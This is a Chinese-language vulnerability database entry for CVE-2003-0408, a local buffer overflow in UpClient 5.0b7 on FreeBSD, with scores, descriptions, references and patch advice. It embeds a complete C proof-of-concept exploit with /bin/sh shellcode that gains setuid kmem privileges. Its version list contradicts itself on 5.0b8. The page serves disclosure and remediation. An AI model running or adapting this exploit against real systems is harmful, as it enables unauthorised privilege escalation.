CVE-2003-0408
CVSS7.2
发布时间 :2003-06-30 00:00:00
修订时间 :2016-10-17 22:33:37
NMCOES    

[原文]Buffer overflow in Uptime Client (UpClient) 5.0b7, and possibly other versions, allows local users to gain privileges via a long -p argument.


[CNNVD]Upclient本地缓冲区溢出漏洞(CNNVD-200306-128)

        
        Uptime Client是一款跟踪用户启动时间,并能发送给服务器,使用户可以对其他数据进行比较统计。
        upclient程序没有正确对命令行参数的边界缓冲区进行检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以'kmem'权限在系统上执行任意指令。
        本地攻击者可以提交超长字符串作为命令行参数提交给upclient,可触发缓冲区溢出,精心构建提交字符串数据可能以'kmem'权限在系统上执行任意指令。
        不过Upclient一般以可选程序安装,默认在FreeBSD中没有安装。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0408
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0408
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-128
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105405629622652&w=2
(UNKNOWN)  BUGTRAQ  20030527 NuxAcid#002 - Buffer Overflow in UpClient
http://www.iss.net/security_center/static/12131.php
(VENDOR_ADVISORY)  XF  upclient-command-line-bo(12131)
http://www.securityfocus.com/bid/7703
(VENDOR_ADVISORY)  BID  7703

- 漏洞信息

Upclient本地缓冲区溢出漏洞
高危 边界条件错误
2003-06-30 00:00:00 2005-10-20 00:00:00
本地  
        
        Uptime Client是一款跟踪用户启动时间,并能发送给服务器,使用户可以对其他数据进行比较统计。
        upclient程序没有正确对命令行参数的边界缓冲区进行检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以'kmem'权限在系统上执行任意指令。
        本地攻击者可以提交超长字符串作为命令行参数提交给upclient,可触发缓冲区溢出,精心构建提交字符串数据可能以'kmem'权限在系统上执行任意指令。
        不过Upclient一般以可选程序安装,默认在FreeBSD中没有安装。
        

- 公告与补丁

        厂商补丁:
        The Uptimes Project
        -------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级程序UpClient 5.0b8:
        https://sourceforge.net/projects/upclient/

- 漏洞信息 (22661)

Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability (EDBID:22661)
freebsd local
2003-05-27 Verified
0 Gino Thomas
N/A [点击下载]
source: http://www.securityfocus.com/bid/7703/info

upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length.

It is possible for a local attacker to seize control of the vulnerable application and have malicious arbitrary code executed in the context of upclient. Typically setuid kmem.

An attacker may harness elevated privileges obtained in this way to manipulate arbitrary areas in system memory through /dev/mem or /dev/kmem devices.

/*
*
* NuxAcid - UPCLIENT Local Buffer Overflow Exploit
* written on/for FreeBSD
* tested against UpClient 5.0b7 on FreeBSD 4.8
* for FreeBSD 5.x the code has to be tweaked
* other versions may be vulnerable too
*
* 2003 by Gino Thomas, http://www.nux-acid.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFERSIZE 1022


unsigned long get_sp(void) {
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  char buffer[BUFFERSIZE] = "";

//FreeBSD exec/setuid Shellcode
static char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

memset(buffer, 0x90 ,sizeof(buffer));
*(long *)&buffer[BUFFERSIZE - 4] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 8] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 16] = 0xbfbffb21;
memcpy(buffer + BUFFERSIZE - 16 - strlen(shellcode), shellcode, strlen(shellcode));

execl("/usr/local/sbin/upclient","upclient", "-p", buffer, NULL);
return 0;
}

		

- 漏洞信息

4842
UpClient upclient Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

The UpTime Project client contains a flaw that may allow a local user to gain elevated privileges. The issue is due to a flaw in the 'uptime' utility not properly sanitizing input to the "-p" switch. If an attacker provides a specially crafted request, they may overflow a buffer and execute arbitrary code with kmem privileges.

- 时间线

2003-05-27 2003-05-23
2003-05-27 Unknow

- 解决方案

Upgrade to version 5.0b8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Upclient Command Line Argument Buffer Overflow Vulnerability
Boundary Condition Error 7703
No Yes
2003-05-27 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Gino Thomas <g.thomas@nux-acid.org>.

- 受影响的程序版本

The Uptimes Project upclient 5.0 b7
The Uptimes Project upclient 5.0 b8

- 不受影响的程序版本

The Uptimes Project upclient 5.0 b8

- 漏洞讨论

upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length.

It is possible for a local attacker to seize control of the vulnerable application and have malicious arbitrary code executed in the context of upclient. Typically setuid kmem.

An attacker may harness elevated privileges obtained in this way to manipulate arbitrary areas in system memory through /dev/mem or /dev/kmem devices.

- 漏洞利用

The following proof of concept exploit has been provided by Gino Thomas:

- 解决方案

The vendor has released a fix to address this issue:


The Uptimes Project upclient 5.0 b7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站